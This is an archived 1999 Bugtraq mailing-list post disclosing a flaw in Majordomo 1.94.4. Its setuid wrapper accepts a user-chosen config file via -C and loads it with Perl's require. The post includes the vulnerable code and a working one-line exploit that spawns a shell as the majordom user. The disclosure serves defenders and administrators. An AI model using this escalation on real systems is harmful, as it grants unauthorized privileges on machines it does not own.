Home page logo
/

bugtraq logo Bugtraq mailing list archives

$cf Security flaw
From: shevek () anarres org (Shevek)
Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT)


I can get majordomo privelidges as a user.

shevek () tirin ~$ cat foo.pl
system("/bin/csh");
shevek () tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom

root () tirin /usr/local/majordomo# ls -ld .
drwxr-x--x   6 majordom daemon       1024 Dec  2 21:49 ./
root () tirin /usr/local/majordomo# ls -l wrapper
-rwsr-xr-x   1 root     daemon       6630 Jul 12 11:21 wrapper*

The lines in Majordomo (I found the bug by simple inspection, it's also in
resend)

$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

while ($ARGV[0]) {      # parse for config file or default list
    if ($ARGV[0] =~ /^-C$/i) {  # sendmail v8 clobbers case
        $cf = $ARGV[1];
        shift(@ARGV);
        shift(@ARGV);
    } elsif ($ARGV[0] eq "-l") {
        $deflist = $ARGV[1];
        shift(@ARGV);
        shift(@ARGV);
    } else {
        die "Unknown argument $ARGV[0]\n";
    }
}
if (! -r $cf) {
    die("$cf not readable; stopped");
}

require "$cf";

Am I doing something wrong, or is this a general flaw? Can I simply
disable all the possible methods of setting $cf without breaking other
things? I haven't had time to inspect the system at any length, I just
glanced at it.

I am not on any greatcircle mailing lists, I would appreciate replies to
my own address if there is discussion on this subject.

Majordomo version 1.94.4
Perl 5.005_03

Ta.

S.

--
Shevek
GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+
US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+
t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y?
Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault